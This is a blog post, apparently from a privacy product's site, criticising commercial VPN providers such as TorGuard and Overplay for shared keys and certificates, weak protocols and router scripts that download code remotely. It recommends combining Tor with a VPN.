Protected by Scarecrow

On VPN providers and “encryption”

Wow.

A while back, when I was writing abook on online privacy. I looked into the services a couple of VPN providers actually–you know–provide. I got very interesting results. Not actually related to Scarecrow, per se, but I’m assuming a lot of our customers are occasionally online. And may think a VPN will help. (It actually might, though….)

TLDR: Many VPN providers do not actually offer what I would call strong encryption. At all. Though this doesn’t mean they won’t throw buzzwords at you.

I checked out TorGuard.net to start with (turns out that “Tor” in the name is short for “torrent” btw). Turns out they offer a choice of protocols: OpenVPN, PPTP, and L2TP. The PPTP link goes to a Wikipedia article about its “security”…which is minimal at best. Though…spoiler…as actually implemented by VPN providers, the PPTP option may be your best protection against casual traffic decryption. Weird but true. It would at least require some computing resources, whereas the others just don’t.

The L2TP method requires what’s called a pre-shared key, which can mean very strong encryption–unfortunately, the key used with TorGuard is “torguard” and is the same for all users. OpenVPN can use client certificates or a pre-shared key, or even both…but TorGuard’s implementation uses the same certificate for everybody, and it’s freely downloadable by anyone at all from their website. They’ll throw buzzwords about the encryption they do, but if the key is known, none of that necessarily matters.

What does this mean? It’s really just this simple: if anyone at all (ISP, wifi hotspot operator, NSA, MPAA, whoever) records your VPN session (from the beginning), you should assume they can decrypt the whole thing at their leisure. This doesn’t necessarily mean they can get everything. But how do you know?

Note: if someone comes in late and records sometime after your session has started, they’re probably out of luck with decrypting your traffic–for the moment. Some people store this stuff forever, just in case a way to break a cipher comes along later on. Regardless…the next time you connect, if they’re still logging…well. A confession: OpenVPN, if properly configured, can (probably) defeat this. Is it properly configured? Not by default, and not without effort. Can PPTP sessions be secured, at all? No. How about anything relying on a pre-shared key? Not if the key is known. Oh well.

I took a quick look around. Overplay.net seemed to offer a cool service, but it has precisely the same limitations. In addition, if you want to configure a connection with a router using the freely available dd-wrt firmware? They’ll give you an easy application you can download to set it up for you! The catch: each time your router reboots, it goes to overplay.net and downloads the code. Which means…well, in addition to the fact that your ISP (or other “attacker”) can possibly decrypt your VPN traffic if they want to? They can also run arbitrary code on your router. Or an attacker who pretends to be overplay.net can do so. Which means, in principle, that they can access your private (home?) network too.

Does this mean no VPN is worth the bother? Not quite, and for two reasons:

1. They obscure your IP address from the websites and other internet resources to which you connect. This is still far from an anonymity guarantee (I recommend browsing to torproject.org and reading their recommendations), but it’s something.
2. They also help you to get past ordinary filters and logging software. This can be very convenient. Not everybody is going to be out to get you, after all, and this is (currently) non-trivial snooping I’m talking about. But did you click on that earlier link? Seems the NSA thinks that if your traffic is encrypted that means they can store it until they can decrypt it. No warrant or active investigation needed. No matter how long that takes. So…hmm.
3. (Who’s counting, anyway?) Not all VPN providers are quite so deliberately misleading. Or at least I hope they’re not. But if they’re not generating a certificate just for you, or a pre-shared key that’s clearly associated with you only? All the caveats in this article apply. That’s not all they’d have to do to protect you, but…at least they’re trying. You know?

You know what? Personally I won’t trust any VPN service until it does allow an audit, or some other form of verifiable transparency. I want to see all config files, and have some assurance that they’re real. Otherwise? This stuff is all based on trust. Do you know these people personally, and fully trust their competence? Me neither.

So, well, there you are. If you want to browse the internet at all, I strongly recommend using one browser (possibly configured to use Tor) for all the sites to which you log in, and another (ideally the Tor Browser Bundle) for everything else. I see nothing wrong with adding a VPN to the mix–but I’d use both the VPN and Tor.

Did you want streaming video or audio? Well, I guess a VPN may be better than nothing. But possibly…not much better. Bear it in mind, okay? Also bear in mind that I’m currently trying really hard not to post a bunch of stuff about “secure” browsing with an iPhone vs. doing the same via Android.

And have fun out there! {8′>